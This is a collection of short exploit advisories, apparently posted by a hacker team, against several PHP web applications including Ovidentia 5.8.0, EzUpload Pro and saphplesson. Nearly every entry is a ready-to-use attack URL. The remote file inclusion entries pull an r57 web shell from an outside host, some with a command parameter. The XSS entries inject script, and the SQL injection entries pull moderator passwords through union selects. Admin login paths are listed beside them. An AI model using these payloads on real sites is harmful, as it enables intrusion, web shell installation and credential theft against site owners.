multiple file inclusion exploits in ovidentia v5.8.0
multiple file inclusion exploits in ovidentia v5.8.0 forum type : ovidentia v5.8.0 bug found by : black-code&sweet-devil team : site-down type : file include exploits : http://www.example.com/orid/index.php?babInstallPath=http://Yoursite.com/r57.txt? http://www.example.com/orid/ovidentia/topman.php?babInstallPath=http://Yoursite.com/r57.txt? http://www.example.com/orid/ovidentia/approb.php?babInstallPath=http://Yoursite.com/r57.txt? http://www.example.com/orid/ovidentia/vacadmb.php?babInstallPath=http://Yoursite.com/r57.txt? http://www.example.com/orid/ovidentia/vacadma.php?babInstallPath=http://Yoursite.com/r57.txt? http://www.example.com/orid/ovidentia/vacadm.php?babInstallPath=http://Yoursite.com/r57.txt? http://www.example.com/orid/ovidentia/statart.php?babInstallPath=http://Yoursite.com/r57.txt? http://www.example.com/orid/ovidentia/search.php?babInstallPath=http://Yoursite.com/r57.txt? http://www.example.com/orid/ovidentia/posts.php?babInstallPath=http://Yoursite.com/r57.txt? http://www.example.com/orid/ovidentia/options.php?babInstallPath=http://Yoursite.com/r57.txt? And more pages are vulnerabe in the directory /ovidentia/ with the same variable, as an example : login.php frchart.php flbchart.php fileman.php faq.php event.php directory.php articles.php artedit.php approb.php calday.php And more .. ;) ### emails: [EMAIL PROTECTED] & [EMAIL PROTECTED] ### All my respect to our friends , lezr.com , g123g.net done .. peace
Xss exploit in Photoalbum B&W v1.3
Xss exploit in Photoalbum B&W v1.3 forum type : Photoalbum B&W v1.3 bug found by : black-code & sweet-devil team : site-down type : Xss exploit : http://www.example.com/superalbum/index.php?pic='>alert(10) path to admin login: ### emails: [EMAIL PROTECTED] & [EMAIL PROTECTED] ### All my respect to our friends , lezr.com , g123g.net done .. peace
multiple file include exploits in EzUpload Pro v2.10
multiple file include exploits in EzUpload Pro v2.10 forum type : EzUpload Pro v2.10 bug found by : black-code & sweet-devil team : site-down type : file include exploits : form.php http://www.example.com/path/form.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd customize.php http://www.example.com/arab3upload/customize.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd initialize.php http://www.example.com/arab3upload/initialize.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd path to admin login: ### emails: [EMAIL PROTECTED] & [EMAIL PROTECTED] ### All my respect to our friends , lezr.com , g123g.net done .. peace
sql injection in PHPcafe.net Tutorial Manager
sql injection in PHPcafe.net Tutorial Manager v1.0 Beta 2 forum type : PHPcafe.net Tutorial Manager v1.0 Beta 2 bug found by : black-code&sweet-devil team : site-down type : Sql injection code: http://www.xxx.com/path/index.php?lang=0&CODE=1&id=[sql] path to admin login: http://www.xxx.com/pth/admin All my respect to my friend sweet-devil , lezr.com , g123g.net .. done .. peace
Multiple Xss exploits in ar-blog v 5.2
Multiple Xss exploits in ar-blog v 5.2 forum type : ar-blog v 5.2 bug found by : black-code team : site-down type : Xss black-code: http://www.xxx.com/path/index.php?page=gb&count=next='>alert(10) http://www.xxx.com/path/index.php?page=gb&count='>alert(10) http://www.xxx.com/path/index.php?page=showtopis&month=mo&year=Year_the_news='>alert(10) http://www.xxx.com/path/index.php?page=showtopis&month=mo&year='>alert(10) http://www.xxx.com/path/index.php?page=showtopis&month=mo='>alert(10) http://www.xxx.com/path/index.php?page=showtopis&month='>alert(10) path to admin login: http://www.xxx.com/pth/admin All my respect to my friend sweet-devil , lezr.com , g123g.net .. done .. peace
Xss exploit in Chipmunk guestbook
Xss exploit in Chipmunk guestbook forum type : Chipmunk guestbook bug found by : black-code team : site-down type : Xss black-code: codes : http://www.xxx.com/scambi/index.php?start='>alert(10) path to admin login: http://www.xxx.com/path/admin All my respect to my friend sweet-devil , lezr.com , g123g.net .. done .. peace
Critical sql injection in saphplesson 2.0
Critical sql injection in : forum type : saphplesson 2.0 bug found by : black-code&sweet-devil team : site-down type : sql injection black-code: http://www.xxx.net/sh3r/add.php?forumid=-1%20union%20select%20Modpassword%20from%20modretor sweet-devil: http://www.xxx.net/lesons/show.php?lessid=1%20union%20select%20null,null,null,ModName,ModPassword,ModPassword,ModPassword%20FROM%20modretor path to admin login: http://www.xxx.com/pth/admin All my respect to my friend sweet-devil , lezr.com , g123g.net .. done .. peace